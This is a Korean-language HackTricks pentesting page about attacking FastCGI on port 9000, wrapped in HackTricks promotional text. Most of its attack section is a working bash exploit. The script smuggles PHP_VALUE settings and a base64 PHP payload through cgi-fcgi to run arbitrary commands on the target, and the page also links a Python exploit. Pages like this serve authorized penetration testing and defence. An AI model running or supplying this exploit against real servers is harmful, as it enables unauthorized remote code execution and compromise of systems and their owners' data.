hacktricks/network-services-pentesting/9000-pentesting-fastcgi.md
2024-02-10 21:30:13 +00:00

3.4 KiB

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

기본 정보

FastCGI가 무엇인지 알고 싶다면 다음 페이지를 확인하세요:

{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %} disable_functions-bypass-php-fpm-fastcgi.md {% endcontent-ref %}

기본적으로 FastCGI9000번 포트에서 실행되며 nmap에서 인식되지 않습니다. 일반적으로 FastCGI는 로컬호스트에서만 수신 대기합니다.

RCE

FastCGI를 사용하여 임의의 코드를 실행하는 것은 매우 쉽습니다:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

또는 다음 파이썬 스크립트를 사용할 수도 있습니다: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법: